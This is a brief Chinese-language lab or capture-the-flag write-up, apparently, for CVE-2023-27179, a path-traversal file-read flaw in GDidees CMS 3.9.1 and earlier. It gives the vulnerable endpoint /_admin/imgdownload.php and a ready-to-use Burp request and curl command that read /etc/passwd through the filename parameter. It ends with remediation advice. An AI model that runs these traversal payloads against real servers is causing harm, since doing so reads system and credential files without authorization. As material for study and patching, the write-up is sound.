GDidees CMS任意文件读取CVE-2023-27179
0x01、漏洞环境
春秋云镜https://yunjing.ichunqiu.com
0x02、漏洞描述
GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞,漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。
0x03、漏洞利用
1、手工利用-1
使用Burp抓包重放请求:GET /_admin/imgdownload.php?filename=../../../../../../etc/passwd
手工利用-2
zhs curl -l http://**** /_admin/imgdownload.php?filename=../../../../../../etc/passwd
3、获取flag 直接将/etc/passwd 替换成flag即可。
0x04、修复建议
1、更新 GDidees CMS 到最新版本,以确保已被修复。
2、限制用户权限,确保敏感文件的访问受限。
3、实施输入验证,确保 filename 参数仅允许合法的文件名。
4、部署 Web 应用防火墙 (WAF) 以阻止恶意请求。